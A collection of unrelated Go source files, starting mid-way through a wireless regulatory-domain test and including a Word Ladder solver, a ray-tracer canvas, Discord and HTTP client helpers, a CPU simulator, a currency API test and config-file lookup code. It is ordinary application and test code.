phy#0 (self-managed)
country US: DFS-UNSET
(2402 - 2437 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40MINUS, NO-80MHZ, NO-160MHZ
(2422 - 2462 @ 40), (6, 22), (N/A), AUTO-BW, NO-80MHZ, NO-160MHZ
(2447 - 2482 @ 40), (6, 22), (N/A), AUTO-BW, NO-HT40PLUS, NO-80MHZ, NO-160MHZ
(5170 - 5190 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5190 - 5210 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5210 - 5230 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5230 - 5250 @ 80), (6, 22), (N/A), NO-OUTDOOR, AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5250 - 5270 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5270 - 5290 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5290 - 5310 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5310 - 5330 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5490 - 5510 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5510 - 5530 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5530 - 5550 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5550 - 5570 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5570 - 5590 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5590 - 5610 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5610 - 5630 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5630 - 5650 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5650 - 5670 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5670 - 5690 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5690 - 5710 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5710 - 5730 @ 80), (6, 22), (0 ms), DFS, AUTO-BW, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5735 - 5755 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5755 - 5775 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5775 - 5795 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-160MHZ, PASSIVE-SCAN
(5795 - 5815 @ 80), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40PLUS, NO-160MHZ, PASSIVE-SCAN
(5815 - 5835 @ 20), (6, 22), (N/A), AUTO-BW, IR-CONCURRENT, NO-HT40MINUS, NO-HT40PLUS, NO-80MHZ, NO-160MHZ, PASSIVE-SCAN
`,
			domain:      "00",
			selfManaged: true,
		},
	}
	mock := &stubCmdRunner{}
	r := &Runner{cmd: mock}
	for i, tc := range testcases {
		mock.out = []byte(tc.out)
		// Test regulatory domain.
		domain, err := r.RegulatoryDomain(context.Background())
		if err != nil {
			t.Errorf("case#%d, unexpected error in RegulatoryDomain: %v", i, err)
		} else if domain != tc.domain {
			t.Errorf("case#%d, got reg domain: %s, expect: %s", i, domain, tc.domain)
		}
		// Test self-managed with the same output of "iw reg get".
		selfManaged, err := r.IsRegulatorySelfManaged(context.Background())
		if err != nil {
			t.Errorf("case#%d, unexpected error in IsRegulatorySelfManaged: %v", i, err)
		} else if selfManaged != tc.selfManaged {
			t.Errorf("case#%d, got self managed: %t, expect: %t", i, selfManaged, tc.selfManaged)
		}
	}
}
|
/*
Word Ladder II
Given two words (beginWord and endWord), and a dictionary's word list, find all shortest transformation sequence(s) from beginWord to endWord, such that:
Only one letter can be changed at a time
Each transformed word must exist in the word list. Note that beginWord is not a transformed word.
For example,
Given:
beginWord = "hit"
endWord = "cog"
wordList = ["hot","dot","dog","lot","log","cog"]
Return
[
["hit","hot","dot","dog","cog"],
["hit","hot","lot","log","cog"]
]
Note:
Return an empty list if there is no such transformation sequence.
All words have the same length.
All words contain only lowercase alphabetic characters.
You may assume no duplicates in the word list.
You may assume beginWord and endWord are non-empty and are not the same.
*/
package main
// Same idea as Problem 127 (Word Ladder): a bidirectional BFS records each
// word's shortest-path neighbours in a map, then a DFS reconstructs all
// shortest ladders from that map.
var exist = struct{}{}

// findLadders returns every shortest transformation sequence from beginWord to
// endWord, where each step changes exactly one letter and each intermediate
// word appears in wordList. Returns an empty list when endWord is unreachable.
func findLadders(beginWord string, endWord string, wordList []string) [][]string {
	wordSet, forward, backward := make(map[string]struct{},len(wordList)), make(map[string]struct{},1), make(map[string]struct{},1)
	// resmap stores, for each word, its neighbours in the direction from
	// endWord back toward beginWord (the DFS later walks end -> begin).
	resmap := make(map[string][]string)
	result := make([][]string,0)
	for _,v := range wordList {
		wordSet[v] = exist
		resmap[v] = []string{}
	}
	if _,ok := wordSet[endWord];!ok {
		return result
	}
	// done is set the first time the two frontiers meet; stopping at the end
	// of that level guarantees all recorded paths are shortest.
	done := false
	// flip tracks whether forward/backward have been swapped, i.e. in which
	// direction an edge must be recorded in resmap.
	flip := false
	delete(wordSet,endWord)
	forward[beginWord],backward[endWord] = exist,exist
	for len(forward) > 0 {
		// Words on the current frontier can no longer be revisited.
		for v := range forward {
			delete(wordSet,v)
		}
		// Always expand the smaller frontier (classic bidirectional-BFS trick).
		if len(forward) > len(backward) {
			forward,backward = backward,forward
			flip = !flip
		}
		next := make(map[string]struct{},1)
		for v := range forward {
			word := []byte(v)
			for i := range word {
				char := word[i]
				// Try every one-letter mutation of the current word.
				for word[i] = 'a'; word[i] <= 'z'; word[i]++ {
					if word[i] == char {
						continue
					}
					s := string(word)
					if _, ok := backward[s]; ok {
						if flip {
							resmap[v] = append(resmap[v], s)
						} else {
							resmap[s] = append(resmap[s], v)
						}
						done = true
					}
					if _, ok := wordSet[s]; ok {
						if flip {
							resmap[v] = append(resmap[v], s)
						} else {
							resmap[s] = append(resmap[s], v)
						}
						next[s] = exist
					}
				}
				word[i] = char
			}
		}
		forward = next
		if done {
			break
		}
	}
	// DFS over resmap to generate every feasible shortest ladder.
	return generate(resmap, endWord, beginWord)
}
// generate walks the adjacency map produced by the BFS phase and rebuilds all
// shortest ladders. wordSet maps a word to its predecessors on some shortest
// path; the recursion bottoms out at endWord and appends current on the way
// back up, so each returned path ends with current.
func generate(wordSet map[string][]string, current, endWord string) [][]string {
	if current == endWord {
		return [][]string{{endWord}}
	}
	var paths [][]string
	for _, prev := range wordSet[current] {
		paths = append(paths, generate(wordSet, prev, endWord)...)
	}
	for i := range paths {
		paths[i] = append(paths[i], current)
	}
	return paths
}
package canvas
import (
"fmt"
"math"
"strings"
"github.com/lukeshiner/raytrace/colour"
)
// Canvas holds pixel grid data.
// Pixels is indexed as Pixels[x][y] (column-major: one inner slice per x
// column of length Height — see New).
type Canvas struct {
	Width, Height int
	Pixels        [][]colour.Colour
}
// WritePixel writes a pixel to the canvas at co-ordinates (x, y).
// The parameter was renamed from `colour` to `c` so it no longer shadows the
// imported colour package inside the method body.
// Note: no bounds checking is performed; out-of-range co-ordinates panic.
func (c *Canvas) WritePixel(x, y int, col colour.Colour) {
	c.Pixels[x][y] = col
}
// Pixel returns the colour at pixel co-ordinates (x,y).
// No bounds checking is performed; out-of-range co-ordinates panic.
func (c *Canvas) Pixel(x, y int) colour.Colour {
	return c.Pixels[x][y]
}
// ToPPM returns the canvas as a plain-text PPM (P3) string: a header with the
// dimensions and max colour value, followed by the pixel rows.
func (c *Canvas) ToPPM() string {
	return c.ppmHeader() + c.ppmColours()
}
// ppmHeader returns the PPM P3 header: magic number, width/height and the
// maximum channel value (255).
func (c *Canvas) ppmHeader() string {
	return fmt.Sprintf("P3\n%d %d\n255\n", c.Width, c.Height)
}
// ppmColours renders the pixel grid as PPM body text, one canvas row per
// logical line, each wrapped to the 70-character PPM limit by formatPPMLine.
func (c *Canvas) ppmColours() string {
	var out strings.Builder
	for y := 0; y < c.Height; y++ {
		row := ""
		for x := 0; x < c.Width; x++ {
			row += ppmFormatPixel(c.Pixel(x, y)) + " "
		}
		out.WriteString(formatPPMLine(row))
	}
	return out.String()
}
// formatPPMLine wraps a single pixel-row string to the PPM 70-character line
// limit, trims surrounding whitespace and terminates it with a newline.
func formatPPMLine(line string) string {
	wrapped := splitLine([]string{line}, 70)
	joined := strings.Join(wrapped, "\n")
	return strings.TrimSpace(joined) + "\n"
}
// splitLine repeatedly breaks the last entry of lines at the space nearest
// (and below) the given length until every entry fits, returning the expanded
// slice. The original recursive formulation is replaced by an equivalent loop.
func splitLine(lines []string, length int) []string {
	for {
		last := lines[len(lines)-1]
		if len(last) <= length {
			return lines
		}
		cut := length - 1
		for last[cut] != ' ' {
			cut--
		}
		lines[len(lines)-1] = last[:cut]
		lines = append(lines, last[cut+1:])
	}
}
// clampColour scales a colour channel from [0,1] to the integer range [0,255],
// rounding up and clamping out-of-range values.
func clampColour(c float64) int {
	scaled := int(math.Ceil(255 * c))
	switch {
	case scaled > 255:
		return 255
	case scaled < 0:
		return 0
	default:
		return scaled
	}
}
// ppmFormatPixel formats a colour as the three space-separated clamped
// integer channels used in a PPM body ("R G B").
func ppmFormatPixel(c colour.Colour) string {
	return fmt.Sprintf(
		"%d %d %d", clampColour(c.Red), clampColour(c.Green), clampColour(c.Blue))
}
// New creates a new Canvas of the given dimensions with every pixel
// initialised to black (0, 0, 0).
func New(width, height int) Canvas {
	var pixels [][]colour.Colour
	for col := 0; col < width; col++ {
		column := []colour.Colour{}
		for row := 0; row < height; row++ {
			column = append(column, colour.New(0, 0, 0))
		}
		pixels = append(pixels, column)
	}
	return Canvas{width, height, pixels}
}
|
package spudo
import (
"github.com/bwmarrin/discordgo"
)
// session wraps a discordgo.Session (embedded, so all discordgo methods are
// promoted) together with the bot's logger for reporting send failures.
type session struct {
	*discordgo.Session
	logger *spudoLogger
}
// newSession creates a discordgo session authenticated with the given bot
// token and attaches the supplied logger. The (possibly partially initialised)
// session is returned together with any error from discordgo.
func newSession(token string, logger *spudoLogger) (*session, error) {
	dg, err := discordgo.New("Bot " + token)
	return &session{Session: dg, logger: logger}, err
}
// SendMessage is a helper function around ChannelMessageSend from
// discordgo. It will send a message to a given channel.
// Send failures are logged and otherwise swallowed.
func (ss *session) SendMessage(channelID string, message string) {
	_, err := ss.ChannelMessageSend(channelID, message)
	if err != nil {
		// Log at error level for consistency with SendEmbed/SendComplex,
		// which report the same kind of failure via logger.error.
		ss.logger.error("Failed to send message response -", err)
	}
}
// SendEmbed is a helper function around ChannelMessageSendEmbed from
// discordgo. It will send an embed message to a given channel; failures are
// logged and otherwise swallowed.
func (ss *session) SendEmbed(channelID string, embed *discordgo.MessageEmbed) {
	if _, err := ss.ChannelMessageSendEmbed(channelID, embed); err != nil {
		ss.logger.error("Failed to send embed message response -", err)
	}
}
// SendComplex is a helper around ChannelMessageSendComplex from discordgo. It
// sends a complex message payload to a given channel; failures are logged and
// otherwise swallowed.
func (ss *session) SendComplex(channelID string, ms *discordgo.MessageSend) {
	if _, err := ss.ChannelMessageSendComplex(channelID, ms); err != nil {
		ss.logger.error("Failed to send complex message response -", err)
	}
}
// AddReaction is a helper method around MessageReactionAdd from discordgo. It
// adds a reaction to a given message; failures are logged and otherwise
// swallowed.
func (ss *session) AddReaction(m *discordgo.MessageCreate, reactionID string) {
	err := ss.MessageReactionAdd(m.ChannelID, m.ID, reactionID)
	if err != nil {
		ss.logger.error("Error adding reaction -", err)
	}
}
|
package keba
import (
"io"
"net"
"strings"
"github.com/evcc-io/evcc/util"
)
// Sender is a KEBA UDP sender.
type Sender struct {
	log  *util.Logger
	addr string // resolved destination address (with default port applied)
	conn *net.UDPConn
}
// NewSender creates a KEBA UDP sender dialled to addr (the default KEBA Port
// is applied when addr has none). On resolve/dial failure the Sender is still
// returned (with a nil conn) together with the error.
func NewSender(log *util.Logger, addr string) (*Sender, error) {
	addr = util.DefaultPort(addr, Port)

	var conn *net.UDPConn
	raddr, err := net.ResolveUDPAddr("udp", addr)
	if err == nil {
		conn, err = net.DialUDP("udp", nil, raddr)
	}

	return &Sender{
		log:  log,
		addr: addr,
		conn: conn,
	}, err
}
// Send msg to receiver over the dialled UDP connection, tracing the payload
// first. Returns any write error.
func (c *Sender) Send(msg string) error {
	c.log.TRACE.Printf("send to %s %v", c.addr, msg)
	_, err := io.Copy(c.conn, strings.NewReader(msg))
	return err
}
|
package v1
import v1 "k8s.io/api/core/v1"
// Storage describes persistent-volume settings for a component.
type Storage struct {
	// Storage class to use. If not set default will be used
	StorageClass string `yaml:"storageClass,omitempty" json:"storageClass,omitempty"`
	// Size. Required if persistence is enabled
	Size string `yaml:"size,omitempty" json:"size,omitempty"`
}

// PodResources describes replica count and compute resources for a pod.
type PodResources struct {
	// Number of desired replicas.
	// +kubebuilder:validation:Optional
	Replicas int `json:"replicas"`
	// Compute resource requests/limits for the pod's containers.
	// +kubebuilder:validation:Optional
	Resources v1.ResourceRequirements `json:"resources"`
}
|
package main
import (
"net/http"
_ "github.com/mattn/go-sqlite3"
"github.com/jmoiron/sqlx"
shoe "github.com/shoelick/goserver_example"
log "github.com/sirupsen/logrus"
)
// main wires up the SQLite-backed repositories and serves the application
// over TLS on port 443.
func main() {
	log.SetReportCaller(true)

	// Open (or create) the SQLite database backing the server.
	db, err := sqlx.Open("sqlite3", "dummy.db")
	if err != nil {
		log.Fatal(err)
	}
	// Released on normal return; log.Fatal exits without running defers.
	defer db.Close()

	//_, err = db.Exec("read db_setup.sql")
	// NOTE: the schema-setup Exec above is disabled; the duplicated error
	// check that followed it was dead code and has been removed.

	// Set up the db repositories.
	userRepo, err := shoe.NewUserRepoSqlite3(db)
	if err != nil {
		log.Fatal(err)
	}
	sessionRepo, err := shoe.NewSessionRepoSqlite3(db)
	if err != nil {
		log.Fatal(err)
	}

	// Set up the server and go.
	s := shoe.NewServer(userRepo, sessionRepo)
	log.Info("Server start")
	http.Handle("/", s)
	err = http.ListenAndServeTLS(":443", "server.crt", "server.key", nil)
	if err != nil {
		log.Fatal("ListenAndServe: ", err)
	}
}
|
// Copyright 2016 Marc-Antoine Ruel. All rights reserved.
// Use of this source code is governed under the Apache License, Version 2.0
// that can be found in the LICENSE file.
package main
import (
"syscall"
"unsafe"
)
// SetConsoleTitle sets the console title via kernel32!SetConsoleTitleW.
// Returns nil on success, or the load/lookup/conversion error or the
// syscall errno on failure.
func SetConsoleTitle(title string) error {
	h, err := syscall.LoadLibrary("kernel32.dll")
	if err != nil {
		return err
	}
	defer syscall.FreeLibrary(h)
	p, err := syscall.GetProcAddress(h, "SetConsoleTitleW")
	if err != nil {
		return err
	}
	s, err := syscall.UTF16PtrFromString(title)
	if err != nil {
		return err
	}
	_, _, errno := syscall.Syscall(p, 1, uintptr(unsafe.Pointer(s)), 0, 0)
	// Bug fix: the previous code returned syscall.Errno(errno) unconditionally.
	// Errno(0) boxed into the error interface is non-nil, so callers saw an
	// "error" even when the call succeeded. Return nil on errno == 0.
	if errno != 0 {
		return errno
	}
	return nil
}
|
package web
import (
"fmt"
"net/http"
)
// init registers the root handler on the default ServeMux so the package is
// usable by importing it (App Engine style).
func init() {
	http.HandleFunc("/", root)
}
// root replies to every request with a fixed greeting.
func root(w http.ResponseWriter, r *http.Request) {
	const greeting = "Hello, world!\n"
	fmt.Fprint(w, greeting)
}
|
package memory
import (
"fmt"
color "github.com/fatih/color"
tablewriter "github.com/olekukonko/tablewriter"
"os"
"strconv"
"sync"
)
// DataMemory models the simulated data memory. The embedded RWMutex guards
// concurrent access to Memory (see read/write).
type DataMemory struct {
	sync.RWMutex
	Memory []int32
}

// registers holds the 32 simulated CPU registers; buffer holds a snapshot of
// previous values used by ShowRegisters to highlight changes.
var registers, buffer [32]int64

// Condition flags — presumably set by the simulated ALU; confirm against the
// instruction implementations elsewhere in the package.
var flagNegative, flagZero, flagOverflow, flagCarry bool
// InitRegisters is a function to initiate register values.
// XZR is the zero register; SP starts at the top of data memory
// (MEMORY_SIZE words of 4 bytes each).
func InitRegisters() {
	registers[XZR] = 0
	registers[SP] = MEMORY_SIZE * 4
}
// SaveRegisters snapshots all register values into buffer so that later
// ShowRegisters calls can highlight which registers changed.
func SaveRegisters() {
	// The builtin copy replaces the manual element-by-element loop and
	// lowers to a single memmove.
	copy(buffer[:], registers[:])
}
// ShowRegisters pretty-prints register values to the terminal.
//
// With showAll, every register is listed and changed ones (relative to the
// buffer snapshot) are highlighted in cyan. Otherwise only changed registers
// are listed with previous (red) and new (green) values; nothing is rendered
// when no register changed.
func ShowRegisters(showAll bool) {
	hasUpdated := false
	table := tablewriter.NewWriter(os.Stdout)
	if showAll {
		hasUpdated = true
		table.SetHeader([]string{"Register", "Value"})
		for i := 0; i < 32; i++ {
			registerNum := strconv.Itoa(i)
			newRegisterVal := strconv.FormatInt(getRegisterValue(uint(i)), 10)
			if getRegisterValue(uint(i)) != buffer[i] {
				table.Append([]string{color.CyanString("R" + registerNum), color.CyanString(newRegisterVal)})
			} else {
				table.Append([]string{"R" + registerNum, newRegisterVal})
			}
		}
	} else {
		table.SetHeader([]string{"Register", "Previous Value", "New Value"})
		for i := 0; i < 32; i++ {
			if getRegisterValue(uint(i)) != buffer[i] {
				hasUpdated = true
				registerNum := strconv.Itoa(i)
				prevRegisterVal := strconv.FormatInt(buffer[i], 10)
				newRegisterVal := strconv.FormatInt(getRegisterValue(uint(i)), 10)
				table.Append([]string{color.CyanString("R" + registerNum), color.RedString(prevRegisterVal), color.GreenString(newRegisterVal)})
			}
		}
	}
	if hasUpdated {
		table.Render()
		fmt.Printf("\n")
	}
}
// read returns the word stored at the given memory address.
// The embedded read lock guarantees mutually exclusive access with writers.
func (dataMemory *DataMemory) read(address uint64) int32 {
	dataMemory.RLock()
	defer dataMemory.RUnlock()
	return dataMemory.Memory[address]
}
// write stores value at the given memory address.
// The embedded write lock guarantees mutually exclusive access.
func (dataMemory *DataMemory) write(address uint64, value int32) {
	dataMemory.Lock()
	defer dataMemory.Unlock()
	dataMemory.Memory[address] = value
}
// getRegisterValue returns the current value of the register at registerIndex.
func getRegisterValue(registerIndex uint) int64 {
	return registers[registerIndex]
}
// setRegisterValue writes value into the register at registerIndex.
// Note: no special-casing of XZR here — presumably enforced by callers.
func setRegisterValue(registerIndex uint, value int64) {
	registers[registerIndex] = value
}
|
package main
import (
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"github.com/onsi/gomega/gbytes"
. "github.com/onsi/gomega/gstruct"
"code.cloudfoundry.org/lager"
"github.com/jarcoal/httpmock"
m "github.com/alphagov/paas-cf/tools/metrics/pkg/metrics"
)
// Currency spec: exercises getCurrencyFromECB and CurrencyMetricGauges
// against a mocked European Central Bank exchange-rate API.
var _ = Describe("Currency", func() {
	logger := lager.NewLogger("currency")
	logger.RegisterSink(lager.NewWriterSink(gbytes.NewBuffer(), lager.INFO))
	// Intercept all HTTP traffic for the duration of each spec.
	BeforeEach(func() {
		httpmock.Activate()
	})
	AfterEach(func() {
		httpmock.DeactivateAndReset()
	})
	Context("European Central Bank API", func() {
		It("Should gracefully return an error when the request is bad", func() {
			httpmock.RegisterResponder(
				"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
				httpmock.NewStringResponder(400, ``),
			)
			rate, err := getCurrencyFromECB("USD", "BADCURRENCY")
			Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
			Expect(err).To(HaveOccurred())
			Expect(err).To(MatchError(ContainSubstring(
				"Did not receive HTTP 200 OK",
			)))
			Expect(rate).To(BeNumerically("==", 0))
		})
	})
	// Malformed JSON body must surface an unmarshalling error, not a panic.
	It("Should gracefully return an error when the response is bad", func() {
		httpmock.RegisterResponder(
			"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
			httpmock.NewStringResponder(200, `{not-well-formatted-json}`),
		)
		rate, err := getCurrencyFromECB("USD", "GBP")
		Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
		Expect(err).To(HaveOccurred())
		Expect(err).To(MatchError(ContainSubstring(
			"Could not unmarshal response from ECB",
		)))
		Expect(rate).To(BeNumerically("==", 0))
	})
	// A well-formed response missing the requested target currency.
	It("Should gracefully return an error when the target is not found", func() {
		httpmock.RegisterResponder(
			"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
			httpmock.NewStringResponder(200, `{"rates": {}}`),
		)
		rate, err := getCurrencyFromECB("USD", "GBP")
		Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
		Expect(err).To(HaveOccurred())
		Expect(err).To(MatchError(ContainSubstring(
			"Could not find target",
		)))
		Expect(rate).To(BeNumerically("==", 0))
	})
	// Happy path: the rate for the target currency is returned verbatim.
	It("Should return the rate correctly", func() {
		httpmock.RegisterResponder(
			"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
			httpmock.NewStringResponder(200, `{"rates": {"GBP": 0.8}}`),
		)
		rate, err := getCurrencyFromECB("USD", "GBP")
		Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
		Expect(err).NotTo(HaveOccurred())
		Expect(rate).To(BeNumerically("==", 0.8))
	})
	Context("CurrencyMetricGauges", func() {
		It("Should handle errors gracefully", func() {
			httpmock.RegisterResponder(
				"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
				httpmock.NewStringResponder(404, ``),
			)
			_, err := CurrencyMetricGauges(logger)
			Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
			Expect(err).To(HaveOccurred())
			Expect(err).To(MatchError(ContainSubstring(
				"Did not receive HTTP 200 OK",
			)))
		})
		It("Should return the configured and the live value correctly", func() {
			httpmock.RegisterResponder(
				"GET", `=~^https://api.exchangeratesapi.io/latest\z`,
				httpmock.NewStringResponder(200, `{"rates": {"GBP": 0.8}}`),
			)
			metrics, err := CurrencyMetricGauges(logger)
			Expect(httpmock.GetTotalCallCount()).To(BeNumerically("==", 1))
			Expect(err).NotTo(HaveOccurred())
			Expect(metrics).To(HaveLen(1))
			Expect(metrics).To(ContainElement(MatchFields(IgnoreExtras, Fields{
				"Name":  Equal("currency.real"),
				"Unit":  Equal("ratio"),
				"Kind":  Equal(m.Gauge),
				"Value": BeNumerically("==", 0.8),
				"Tags": ContainElement(MatchFields(IgnoreExtras, Fields{
					"Label": Equal("code"), "Value": Equal("USD"),
				})),
			})))
		})
	})
})
|
package internal
import (
"crypto/tls"
"io/ioutil"
"net"
"net/http"
"time"
"github.com/goodmustache/pt/tracker/terror"
)
// ConnectionConfig is for configuring a TrackerConnection.
type ConnectionConfig struct {
	// SkipSSLValidation disables TLS certificate verification on the client.
	SkipSSLValidation bool
}

// TrackerConnection represents a connection to the Cloud Controller
// server.
type TrackerConnection struct {
	HTTPClient *http.Client
	// UserAgent is not set by NewTrackerConnection — presumably populated by
	// a caller before use; confirm against request-building code.
	UserAgent string
}
// NewTrackerConnection returns a new TrackerConnection with provided
// configuration: environment-proxy support, a 5s dial timeout with 30s
// keep-alive, and optional TLS verification skipping.
func NewTrackerConnection(config ConnectionConfig) *TrackerConnection {
	dialer := &net.Dialer{
		KeepAlive: 30 * time.Second,
		Timeout:   5 * time.Second,
	}
	transport := &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: config.SkipSSLValidation,
		},
		Proxy:       http.ProxyFromEnvironment,
		DialContext: dialer.DialContext,
	}
	return &TrackerConnection{
		HTTPClient: &http.Client{Transport: transport},
	}
}
// Make performs the request and parses the response.
// Transport-level errors are returned as-is; otherwise body handling and
// HTTP-status conversion are delegated to populateResponse.
func (connection *TrackerConnection) Make(request *Request, passedResponse *Response) error {
	// In case this function is called from a retry, passedResponse may already
	// be populated with a previous response. We reset in case there's an HTTP
	// error and we don't repopulate it in populateResponse.
	passedResponse.reset()
	response, err := connection.HTTPClient.Do(request.Request)
	if err != nil {
		return err
	}
	return connection.populateResponse(response, passedResponse)
}
// handleStatusCodes captures the response body into passedResponse.RawResponse
// (substituting "{}" for 204 No Content) and converts HTTP errors (>= 400)
// into terror.RawHTTPStatusError.
func (*TrackerConnection) handleStatusCodes(response *http.Response, passedResponse *Response) error {
	// Always close the body. Previously Close was deferred only on the
	// read branch, so 204 No Content responses leaked the body/connection.
	defer response.Body.Close()
	if response.StatusCode == http.StatusNoContent {
		passedResponse.RawResponse = []byte("{}")
	} else {
		rawBytes, err := ioutil.ReadAll(response.Body)
		if err != nil {
			return err
		}
		passedResponse.RawResponse = rawBytes
	}
	if response.StatusCode >= 400 {
		return terror.RawHTTPStatusError{
			StatusCode:  response.StatusCode,
			RawResponse: passedResponse.RawResponse,
			RequestIDs:  response.Header[http.CanonicalHeaderKey("x-request-id")],
		}
	}
	return nil
}
// populateResponse records the raw HTTP response and the Location header on
// passedResponse, converts status codes via handleStatusCodes, and finally
// decodes the JSON body into DecodeJSONResponseInto when one is provided.
func (connection *TrackerConnection) populateResponse(response *http.Response, passedResponse *Response) error {
	passedResponse.HTTPResponse = response
	if loc := response.Header.Get("Location"); loc != "" {
		passedResponse.ResourceLocationURL = loc
	}
	if err := connection.handleStatusCodes(response, passedResponse); err != nil {
		return err
	}
	if passedResponse.DecodeJSONResponseInto == nil {
		return nil
	}
	return DecodeJSON(passedResponse.RawResponse, passedResponse.DecodeJSONResponseInto)
}
|
package config
import (
"fmt"
"io/ioutil"
"os"
homedir "github.com/mitchellh/go-homedir"
)
// Source contains information about configuration source file lookup and
// post-processing.
type Source struct {
	FileName       string                  // File name of configuration file. Can be without extension
	FileNames      []string                // Aliases for configuration files
	Subfolder      string                  // Subfolder name
	SkipValidation bool                    // Disable automatic validation for structs with Validate method
	LookupHome     bool                    // If true, module will make attempt to find config inside user home folder
	LookupEtc      bool                    // If true, module will make attempt to find config in /etc/
	OnAfterRead    func(interface{}) error // Callback invoked after read and before validation
}
// GetAllFileNames returns all candidate file names for configuration files:
// the primary FileName first, then each alias, each expanded via expandName.
// Empty entries are skipped.
func (s Source) GetAllFileNames() []string {
	var names []string
	for _, candidate := range append([]string{s.FileName}, s.FileNames...) {
		if len(candidate) > 0 {
			names = append(names, expandName(candidate)...)
		}
	}
	return names
}
// GetAllFolders returns all folders to look in for configuration files:
// the working directory, the optional subfolder, the user home directory
// (when LookupHome) and /etc (when LookupEtc, Unix-like systems only).
func (s Source) GetAllFolders() []string {
	sep := string(os.PathSeparator)
	folders := []string{"."}
	if len(s.Subfolder) > 0 {
		folders = append(folders, "."+sep+s.Subfolder+sep)
	}
	if s.LookupHome {
		home, err := homedir.Dir()
		if err == nil {
			folders = append(folders, home)
		}
	}
	if s.LookupEtc && os.PathSeparator == '/' {
		etc := "/etc/"
		if len(s.Subfolder) > 0 {
			etc += s.Subfolder + "/"
		}
		folders = append(folders, etc)
	}
	return folders
}
// GetAllPaths returns the cross product of all lookup folders and all
// candidate file names, joined via pathConcat, in lookup order.
func (s Source) GetAllPaths() []string {
	var paths []string
	names := s.GetAllFileNames()
	for _, folder := range s.GetAllFolders() {
		for _, name := range names {
			paths = append(paths, pathConcat(folder, name))
		}
	}
	return paths
}
// Find searches the candidate paths in order and returns the first one that
// exists on disk, together with true; otherwise ("", false).
func (s Source) Find() (string, bool) {
	for _, candidate := range s.GetAllPaths() {
		_, err := os.Stat(candidate)
		if err == nil {
			return candidate, true
		}
	}
	return "", false
}
// Read method reads configuration from file.
// It locates the first existing candidate file, parses it into target via
// readBytes, invokes the OnAfterRead callback (if any) and finally runs the
// target's Validate method unless SkipValidation is set.
func (s Source) Read(target interface{}) error {
	f, ok := s.Find()
	if !ok {
		return LocateAndReadError{
			Paths: s.GetAllPaths(),
			Cause: "no configuration file found",
		}
	}
	// Reading all bytes
	bts, err := ioutil.ReadFile(f)
	if err != nil {
		return fmt.Errorf(
			`unable to read configuration file "%s" - %s`,
			f, err.Error(),
		)
	}
	// Parse by extension/content — see readBytes.
	err = readBytes(f, bts, target)
	if err != nil {
		return err
	}
	// Post-read hook runs before validation.
	if s.OnAfterRead != nil {
		if err = s.OnAfterRead(target); err != nil {
			return err
		}
	}
	// Optional struct validation; failures are wrapped with file context.
	if !s.SkipValidation {
		if v, ok := target.(validable); ok {
			err = v.Validate()
			if err != nil {
				err = MarshalError{Cause: err.Error(), FileName: f, Struct: target}
			}
		}
	}
	return err
}
// validable is implemented by configuration structs that can validate
// themselves after loading (see Source.Read).
type validable interface {
	Validate() error
}
|
package routers
import (
"festival/app/common/middleware/auth"
